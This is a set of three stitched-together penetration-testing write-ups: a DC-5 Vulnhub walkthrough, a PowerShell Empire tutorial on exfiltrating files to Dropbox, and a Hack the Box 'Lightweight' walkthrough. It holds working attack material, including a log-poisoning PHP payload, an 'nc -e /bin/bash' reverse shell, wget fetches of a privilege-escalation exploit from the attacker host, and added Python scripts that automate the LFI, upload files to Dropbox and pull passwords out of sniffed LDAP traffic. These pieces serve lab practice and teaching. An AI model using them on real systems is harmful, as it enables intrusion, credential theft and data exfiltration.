DC-5 Vulnhub Walkthrough


Today we are going to take on another boot2root challenge, “DC-5”. Credit for building this VM goes to “DCAU”; as with the other boot2root challenges, the goal is to obtain root access. You can download it from here.
Security Level: Beginner

Penetrating Methodology

Scanning
  • Discovering the target's IP
  • Network scanning (Nmap)
Enumeration
  • Surfing the HTTP service on port 80
  • Abusing a file-inclusion parameter (LFI) to read /etc/passwd
  • Reading the Nginx access log through the same LFI
Exploiting
  • Poisoning the access log via Burp Suite to turn the LFI into code execution
  • Using Netcat to get a reverse shell
  • Spawning a TTY shell
Privilege Escalation
  • Checking SUID binaries
  • Local privilege escalation via the SUID screen 4.5.0 binary
  • Accessing the root directory
  • Capturing the flag

Walkthrough

Scanning

Let’s start off with scanning the network to find our target.
netdiscover




We found our target's IP address, 192.168.1.108. Our next step is to scan it with nmap.
nmap -A 192.168.1.108




Enumeration
The nmap result shows an HTTP service running on port 80, so we browse to the target's IP address and explore the web page for hints.




While exploring the site we find a contact form, which looks interesting; we fill it in and submit it.




After submitting the form we notice that the copyright footer says 2019.




Refreshing the page several times, we notice the copyright year flips between 2019 and 2020. The footer is being pulled in as a separate file by thankyou.php, which makes the parameter it is loaded through a natural candidate for file inclusion.





We quickly test for a Local File Inclusion (LFI) vulnerability by requesting /etc/passwd through that parameter.




After trying various file paths, we find that the nginx access log can be read through the same inclusion.




Let's capture the request for the nginx access log in Burp Suite. The plan is log poisoning: whatever we send in an HTTP request is written to the access log, and the LFI then includes that log as PHP, so anything PHP-shaped in it gets executed.




Exploiting LFI
In the captured request we inject a one-line PHP snippet that runs whatever arrives in a cmd parameter, so that it is written into the access log. A GET request that includes the poisoned log through the LFI then executes it and gives us command execution on the server.





To verify that it works, we append a new parameter to the URL, &cmd=id. The output of id in the response confirms that we are executing commands on the server.
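The poisoning exchange described above, written out as an added Python example (this is not code from the original walkthrough). The target IP and the cmd parameter come from the page; the name of the include parameter (file) and the nginx log path (/var/log/nginx/access.log) are assumptions the text does not state, and the User-Agent header is used as the injection point because nginx copies it verbatim into the combined log. The second half is the check a defender would run over that same log to spot the poisoning, run here over constructed sample log lines.

```python
"""nginx access-log poisoning through the LFI, plus the defender's check over the same log.

Assumptions not stated on the page: the include parameter is called "file" and
nginx writes a combined-format log to /var/log/nginx/access.log.
"""
import re
import urllib.request
from urllib.parse import quote

TARGET = "http://192.168.1.108"          # from the walkthrough
INCLUDE_PAGE = "/thankyou.php"           # the page that pulls in the footer
INCLUDE_PARAM = "file"                   # assumption
LOG_PATH = "/var/log/nginx/access.log"   # assumption: nginx default location
# One-liner that runs whatever arrives in ?cmd=; it is inert text in the log
# until PHP include()s the log file.
PAYLOAD = "<?php system($_GET['cmd']); ?>"


def poison_headers(payload=PAYLOAD):
    """Request 1: nginx copies the User-Agent verbatim into the access log."""
    return {"User-Agent": payload}


def lfi_exec_url(cmd, base=TARGET, page=INCLUDE_PAGE, param=INCLUDE_PARAM, log=LOG_PATH):
    """Request 2: include the poisoned log, passing the command as &cmd=."""
    return f"{base}{page}?{param}={log}&cmd={quote(cmd)}"


def run(cmd):
    """Poison once, then execute cmd; returns the raw page with the command output embedded."""
    urllib.request.urlopen(
        urllib.request.Request(TARGET + "/", headers=poison_headers())).read()
    return urllib.request.urlopen(lfi_exec_url(cmd)).read().decode(errors="replace")


# ---- defender side: spot the poisoning in the log it was written to ----
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')
PHP_TAG = re.compile(r"<\?(php|=)", re.I)
LFI_HINT = re.compile(r"(\.\./|/etc/passwd|/var/log/|/proc/self/|php://|expect://|data:)", re.I)


def suspicious_entries(lines):
    """Return (client_ip, request, reasons) for lines carrying PHP tags or LFI-style paths."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        reasons = []
        if PHP_TAG.search(m["ua"]) or PHP_TAG.search(m["req"]) or PHP_TAG.search(m["ref"]):
            reasons.append("php-tag")
        if LFI_HINT.search(m["req"]):
            reasons.append("lfi-path")
        if reasons:
            hits.append((m["ip"], m["req"], reasons))
    return hits


# Constructed sample log (combined format), not a real capture from the VM.
SAMPLE_LOG = [
    '192.168.1.110 - - [10/Apr/2019:10:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '192.168.1.110 - - [10/Apr/2019:10:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"<?php system($_GET[\'cmd\']); ?>"',
    '192.168.1.110 - - [10/Apr/2019:10:00:03 +0000] '
    '"GET /thankyou.php?file=/var/log/nginx/access.log&cmd=id HTTP/1.1" 200 4102 "-" "curl/7.64.0"',
]

if __name__ == "__main__":
    print(lfi_exec_url("id"))
    for ip, req, why in suspicious_entries(SAMPLE_LOG):
        print(ip, why, req)
```

run() needs the live VM; everything else runs offline. Note that the poisoning line is the one with a PHP tag in the User-Agent, and the execution line is the one whose request names a log path: both stand out even without the exploit succeeding, which is why a web server that lets PHP include arbitrary paths should be fixed by whitelisting the includable files rather than by hiding the log.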



Reverse Shell

Next we pass a netcat reverse-shell command through the cmd parameter. With a netcat listener already running on our attacking machine (192.168.1.110), this gives us a reverse shell.
nc -e /bin/bash 192.168.1.110 1234




Booyeah!! We have a reverse shell. To get a proper shell we spawn a TTY with Python. Without wasting time, we look for SUID-enabled binaries, and /bin/screen-4.5.0 looks interesting.
nc -lvp 1234




Privilege Escalation
It quickly strikes us to search for screen 4.5.0 with searchsploit, and what we get is a local privilege escalation exploit (EDB-ID 41154). We copy the exploit to our system.
searchsploit screen 4.5.0
searchsploit -m 41154



As we could not run this shell script as-is on the target, we compile its parts manually on our own machine. First we review its code with cat.
cat 41154.sh

Looking at the script, you will notice that it embeds two programs written in C; we split it into three parts for manual compilation:
  • Copy the yellow-highlighted code, paste it into a text file and save it as libhax.c
  • Copy the orange-highlighted code, paste it into a text file and save it as rootshell.c
  • Copy the remaining code, paste it into a text file and save it as 41154.sh



In the images below you can see the copied code pasted into rootshell.c, then into libhax.c, and the remaining code into 41154.sh; all three files are saved in the same folder on our system.




Now we compile the two C files locally with gcc: libhax.c as a shared object, then rootshell.c as an executable. Since the binaries will run on the target, they must match its architecture and a compatible libc; if in doubt, build on a system with the same distribution or link statically.
gcc -fPIC -shared -ldl -o libhax.so libhax.c
gcc -o rootshell rootshell.c
With all three files in our shell folder, we serve them with Python's built-in HTTP server (port 8000 by default) so that the target can fetch them.
python -m SimpleHTTPServer




From the reverse shell, we download all three files into the target's /tmp folder.
wget http://192.168.1.110:8000/41154.sh
wget http://192.168.1.110:8000/libhax.so
wget http://192.168.1.110:8000/rootshell




After making the script executable and running it, we have root access. The final thing to do is read the flag.
chmod 777 41154.sh
./41154.sh
id
cd /root
ls
cat thisistheflag.txt


Data Exfiltration using PowerShell Empire


In a previous post we discussed “Command and Control with DropboxC2”. Here we demonstrate data exfiltration with PowerShell Empire, pulling data out of the victim and into our own Dropbox account; you will see how an intruder can exfiltrate data over cloud storage.
What is Data Exfiltration
Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data transfer from a computer. It is also commonly called data extrusion or data exportation, and is considered a form of data theft. Over the past couple of decades, a number of data exfiltration incidents have severely damaged consumer confidence, corporate valuations and intellectual property of businesses, and the national security of governments across the world.


Methods of Data exfiltration
Open Methods:
·         HTTP/HTTPS Downloads & Uploads
·         FTP
·         Email
·         Instant Messaging
·         P2P filesharing
Concealed Methods:
·         SSH
·         VPN
·         Protocol Tunneling
·         Cloud Storage Uploads
·         Steganography
·         Timing channel
Generate Token Via Dropbox API
The Empire module needs a Dropbox API access token. To get one, first create a Dropbox account, then head to the developer tools here. A page similar to the one shown below opens. Select “Dropbox API”, choose “App folder” in the type-of-access section, name the app as you like, and click the Create App button.



This leads to the page shown below. Scroll to the OAuth 2 section and click “Generate access token”. This produces the token required for this exercise; copy it, and treat it like a password, since anyone holding it can read and write the app folder.



Data Exfiltration
Now we use PowerShell Empire for the exfiltration, assuming the victim machine is already compromised; all that remains is to copy data off it without the user's knowledge.
As you can see we already have an Empire agent, meaning a shell on the victim's machine has been spawned, and Empire ships a post-exploitation module for Dropbox exfiltration. Set the source file on the victim, the destination path in Dropbox and the API token, then execute:
usemodule exfiltration/exfil_dropbox
set SourceFilePath C:\Users\raj\Desktop\notes.txt
set TargetFilePath /Apps/notes.txt
set ApiKey
execute



In Dropbox, notes.txt now appears under the app folder, which means the data was transferred from the source location to the destination.



Thus we have transferred data from the victim's machine to our Dropbox account; this technique is known as Dropbox exfiltration.
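For readers who want to see what the Empire module is doing under the hood, here is an added Python example (not Empire's code and not from the original post) that performs the same upload with a single authenticated POST to the Dropbox files/upload endpoint. The endpoint, headers and JSON argument are the documented Dropbox HTTP API; the environment variable name DROPBOX_TOKEN and the 150 MB single-upload limit check are this example's own choices. With an app created with “App folder” access, the remote path is interpreted relative to that folder.

```python
"""What a Dropbox exfiltration module boils down to: one authenticated POST to
/2/files/upload. Added example, not Empire's own code.
"""
import json
import os
import urllib.request

UPLOAD_URL = "https://content.dropboxapi.com/2/files/upload"
MAX_SINGLE_UPLOAD = 150 * 1024 * 1024  # larger files need the upload_session endpoints


def build_upload_request(token, local_path, remote_path, data=None):
    """Assemble (url, headers, body) without sending, so the pieces can be inspected.

    `data` lets a caller supply the bytes directly (used for offline testing);
    otherwise the local file is read.
    """
    if data is None:
        with open(local_path, "rb") as fh:
            data = fh.read()
    if len(data) > MAX_SINGLE_UPLOAD:
        raise ValueError("files/upload takes at most 150 MB; use an upload session")
    api_arg = {"path": remote_path, "mode": "add", "autorename": True, "mute": False}
    headers = {
        "Authorization": f"Bearer {token}",
        "Dropbox-API-Arg": json.dumps(api_arg),   # the API parameters ride in a header
        "Content-Type": "application/octet-stream",
    }
    return UPLOAD_URL, headers, data


def exfiltrate(local_path, remote_path, token=None):
    """Upload local_path to Dropbox; returns the file metadata the API echoes back."""
    token = token or os.environ["DROPBOX_TOKEN"]  # assumption: token supplied via env, not hard-coded
    url, headers, body = build_upload_request(token, local_path, remote_path)
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.loads(resp.read().decode())


if __name__ == "__main__":
    # Same source file as the Empire module settings in the walkthrough.
    print(exfiltrate(r"C:\Users\raj\Desktop\notes.txt", "/notes.txt"))
```

From the defender's side, the artefact to hunt for is exactly this request: an outbound POST to content.dropboxapi.com carrying a Dropbox-API-Arg header from a host or process that has no business using Dropbox. Proxy or TLS-inspection logs will show it even when the file contents are opaque.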

Lightweight: Hack the Box Walkthrough


Today we are going to solve another CTF challenge, “Lightweight”. It is a retired vulnerable lab from Hack the Box, which offers a collection of vulnerable labs as challenges, from beginner to expert level, so that pentesters can practise online according to their experience.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are online available, therefore, they have a static IP. The IP of lightweight is 10.10.10.119
Penetration Methodologies
Scanning
·         Network scanning (Nmap)
Enumeration
·         LDAP enumeration (Nmap NSE script)
·         HTTP surfing
Exploiting
·         Connecting over SSH
·         Identifying binaries with file capabilities
·         Sniffing a password with tcpdump
·         Obtaining user.txt
Privilege Escalation
·         Extracting backup.7z
·         Identifying another user's credentials
·         Exploiting the openssl capability
·         Obtaining root.txt

Walkthrough
Scanning
Let’s start off with our basic Nmap command to find out the open ports and services.
nmap -A 10.10.10.119
As you can observe, port 389 is open for LDAP, and ports 22 and 80 serve SSH and HTTP respectively.

Enumeration
With the help of the nmap NSE script ldap-search we go for LDAP enumeration:
nmap -Pn -p 389 --script ldap-search 10.10.10.119


Luckily, nmap lists two usernames, ldapuser1 and ldapuser2, along with their password hashes; we did not manage to crack them, though.


Since we know an HTTP service is running on port 80, we browse to the target IP and are greeted by the page below. It says “This site is protected against bruteforcing”, which suggests fail2ban is running inside the VM; we also find three hyperlinks.


Opening the user.php link, the highlighted text says that a user has been automatically added on the machine for us, named after our own IP address.


Exploiting
So we connect over SSH using 10.10.14.10 as both username and password. Not yet sure how to reach the hidden flags, we look for binaries carrying file capabilities with getcap, with a fruitful result.
getcap -r / 2>/dev/null


As the image shows, tcpdump has been granted the capability to capture network traffic even from a low-privileged account, so we run the following command to watch for LDAP traffic:
tcpdump -i any -X port ldap
Then, in the browser, we open status.php, which triggers an LDAP authentication behind the scenes; the page takes a while to load, so something is clearly happening.
As predicted, the captured traffic shows the ldapuser2 password in plaintext: an LDAP simple bind over unencrypted LDAP sends the password in the clear.
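The same harvesting done programmatically, as an added Python example that is not part of the original write-up: a minimal BER decoder that pulls the DN and password out of an LDAP simple BindRequest. In practice the bytes would come from the TCP payload of a capture (tcpdump -w, then any pcap reader); here the messages are constructed inline, with a made-up DN and password, so the script runs offline. The encoder is included only to build the samples and to round-trip long-form lengths.

```python
"""Recover the DN and password from an LDAP simple BindRequest seen on the wire.

Added example, not from the original write-up. The sample messages below are
constructed, not captured from the box.
"""

# BER tags used by an LDAP bind exchange (RFC 4511)
SEQUENCE, INTEGER, OCTET_STRING = 0x30, 0x02, 0x04
BIND_REQUEST = 0x60        # [APPLICATION 0]
BIND_RESPONSE = 0x61       # [APPLICATION 1]
SIMPLE_AUTH = 0x80         # AuthenticationChoice: simple [0] OCTET STRING


def _read_tlv(buf, pos):
    """Decode one BER tag/length/value at buf[pos]; return (tag, value, next_pos)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                      # long form: low bits = number of length bytes
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def _tlv(tag, value):
    """Encode one TLV, using the long length form when the value is 128 bytes or more."""
    n = len(value)
    if n < 0x80:
        return bytes([tag, n]) + value
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + value


def encode_simple_bind(message_id, dn, password):
    """Build a BindRequest as a client would send it (message_id < 128 for simplicity)."""
    bind = (_tlv(INTEGER, b"\x03")                       # LDAPv3
            + _tlv(OCTET_STRING, dn.encode())
            + _tlv(SIMPLE_AUTH, password.encode()))
    return _tlv(SEQUENCE, _tlv(INTEGER, bytes([message_id])) + _tlv(BIND_REQUEST, bind))


def parse_simple_bind(packet):
    """Return (message_id, dn, password) if packet is a simple BindRequest, else None."""
    tag, msg, _ = _read_tlv(packet, 0)
    if tag != SEQUENCE:
        return None
    tag, mid, pos = _read_tlv(msg, 0)
    if tag != INTEGER:
        return None
    tag, bind, _ = _read_tlv(msg, pos)
    if tag != BIND_REQUEST:                # e.g. a BindResponse or SearchRequest
        return None
    _, _version, pos = _read_tlv(bind, 0)
    _, dn, pos = _read_tlv(bind, pos)
    tag, auth, _ = _read_tlv(bind, pos)
    if tag != SIMPLE_AUTH:                 # 0xA3 would be SASL; nothing to harvest there
        return None
    return int.from_bytes(mid, "big"), dn.decode(), auth.decode()


def find_binds(stream):
    """Walk a reassembled TCP payload of back-to-back LDAP messages; collect simple binds."""
    found, pos = [], 0
    while pos + 2 <= len(stream):
        _, _, nxt = _read_tlv(stream, pos)
        creds = parse_simple_bind(stream[pos:nxt])
        if creds:
            found.append(creds)
        pos = nxt
    return found


# Constructed sample traffic (not a real capture): bind, server's success reply, second bind.
CAPTURED_BIND = b"\x30\x16\x02\x01\x01\x60\x11\x02\x01\x03\x04\x08cn=admin\x80\x02pw"
BIND_RESPONSE_OK = b"\x30\x0c\x02\x01\x01\x61\x07\x0a\x01\x00\x04\x00\x04\x00"
SAMPLE_STREAM = (CAPTURED_BIND + BIND_RESPONSE_OK
                 + encode_simple_bind(7, "uid=ldapuser2,ou=People,dc=example,dc=com", "Passw0rd!"))

if __name__ == "__main__":
    for mid, dn, pw in find_binds(SAMPLE_STREAM):
        print(f"msg {mid}: {dn} -> {pw}")
```

The fix on the server side is the obvious one: require LDAPS or StartTLS for binds, or at least SASL, so that a capability-bearing tcpdump on the same host sees only ciphertext.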


We then switch user with the following credentials and obtain the first flag, user.txt:
Username: ldapuser2
Password: 8bc8251332abe1d7f105d3e53ad39ac2


Privilege Escalation
Inside ldapuser2's home directory we find an archive, backup.7z. To inspect it we need to transfer it to our local machine, which we do by base64-encoding it and copying the output.
cat backup.7z | base64

After decoding it on our machine we try to extract it, but it is password protected.


Using the online service lostmypass.com we recover the archive password, which turns out to be “delete”, as shown in the image below.



Using the password “delete” we extract the archive, which contains a number of PHP files; among them we look for status.php.

The status.php file reveals the password of ldapuser1, as shown in the image.



We switch to ldapuser1 and move into that user's home directory.
su ldapuser1
password: f3ca9d298a553da117442deeb6fa932d


Running getcap again as ldapuser1, we see a copy of openssl that has been granted a capability allowing it to read files owned by root, so we grab root.txt directly through it: openssl base64-encodes the file it is allowed to read, and base64 -d decodes the output on the fly.
getcap -r / 2>/dev/null
./openssl base64 -a -in /root/root.txt | base64 -d